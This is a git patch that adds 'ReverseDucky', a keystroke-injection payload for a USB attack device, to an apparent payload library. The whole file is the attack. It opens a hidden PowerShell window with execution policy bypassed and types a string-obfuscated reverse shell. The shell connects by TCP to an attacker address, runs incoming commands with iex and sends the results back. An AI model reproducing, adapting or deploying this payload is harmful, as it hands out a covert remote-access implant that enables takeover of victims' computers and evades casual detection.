From 389a11d5ade19c6e5b959f3cef7199df7e3d7f3b Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Sat, 17 Jul 2021 21:15:35 +0200
Subject: [PATCH] ReverseDucky

An obfuscated reverse shell, executed directly in powershell, hidden in the background.
---
 .../payloads/remote_access/ReverseDucky.txt   | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 library/payloads/remote_access/ReverseDucky.txt

diff --git a/library/payloads/remote_access/ReverseDucky.txt b/library/payloads/remote_access/ReverseDucky.txt
new file mode 100644
index 0000000..fc5ec48
--- /dev/null
+++ b/library/payloads/remote_access/ReverseDucky.txt
@@ -0,0 +1,33 @@
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -W hidden -Exec Bypass
+DELAY 250
+ENTER
+
+DELAY 200
+STRING SeT-ITeM  VARIABLE:Q528Yl  ( [TYpE]("{3}{0}{1}{2}" -F '.','eN','cOdinG','TexT')  )  ;${clie
+DELAY 200
+STRING NT} = &("{1}{0}{2}" -f 'Objec','New-','t') ("{6}{3}{4}{0}{7}{1}{2}{5}{8}" -f'm','.S','oc
+DELAY 200
+STRING k','s','te','e','Sy','.Net','ts.TCPClient')(("{4}{1}{3}{0}{2}" -f'*3RD BLOCK*','.*2ND BLOCK*','.*4TH BLOCK*','.','*FIRST BLOCK*'),P
+DELAY 200
+STRING ORT);${sTReAM} = ${cliEnt}.("{1}{2}{0}" -f'tream','G','etS').Invoke();[byte[]]${byteS} = 0..655
+DELAY 200
+STRING 35|&('%'){0};while((${I} = ${STReAM}.("{0}{1}"-f 'R','ead').Invoke(${bYtes}, 0, ${ByTES}."lENgt
+DELAY 200
+STRING h")) -ne 0){;${DATa} = (.("{3}{2}{1}{0}" -f 'ect','bj','w-O','Ne') -TypeName ("{2}{0}{3}{4}{1
+DELAY 200
+STRING }"-f 'Tex','IEncoding','System.','t','.ASCI'))."GEtStrING"(${byTes},0, ${I});${senDBaCk} = (.("{0
+DELAY 200
+STRING }{1}"-f'i','ex') ${DATa} 2>&1 | .("{0}{2}{1}"-f 'Out-Str','ng','i') );${SendBACK2} = ${sENDBAc
+DELAY 200
+STRING K} + 'PS ' + (.("{1}{0}" -f 'd','pw'))."pATH" + '> ';${sENDbyte} = ( ( GI  VaRiABLE:Q528YL )."vA
+DELAY 200
+STRING LuE"::"ASciI").("{2}{1}{0}"-f 'es','t','GetBy').Invoke(${SENdBaCK2});${STREam}.("{1}{0}"-f 't
+DELAY 200
+STRING e','Wri').Invoke(${sEnDBYTE},0,${SENdBYTE}."LengtH");${sTReAM}.("{1}{0}" -f 'lus
+DELAY 200
+STRING h','F').Invoke()};${cliENt}.("{1}{0}"-f'e','Clos').Invoke()
+DELAY 200
+ENTER
\ No newline at end of file